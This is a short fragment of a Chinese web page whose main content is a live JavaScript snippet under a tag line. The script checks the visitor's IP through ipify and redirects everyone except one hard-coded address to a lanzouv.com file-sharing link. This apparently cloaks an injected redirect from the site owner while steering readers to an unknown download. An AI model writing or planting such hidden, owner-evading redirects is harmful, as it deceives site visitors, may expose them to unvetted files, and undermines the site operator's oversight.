标签:好心布衣
async function checkIpAndRedirect() {
const TARGET_IP = "115.134.25.58";
const REDIRECT_URL = "https://wwbee.lanzouv.com/b00rop83nc";
try {
const response = await fetch('https://api.ipify.org?format=json');
const data = await response.json();
const currentIP = data.ip;
if (currentIP === TARGET_IP) {
} else {
window.location.href = REDIRECT_URL;
}
} catch (error) {
}
}
checkIpAndRedirect();
发布时间:

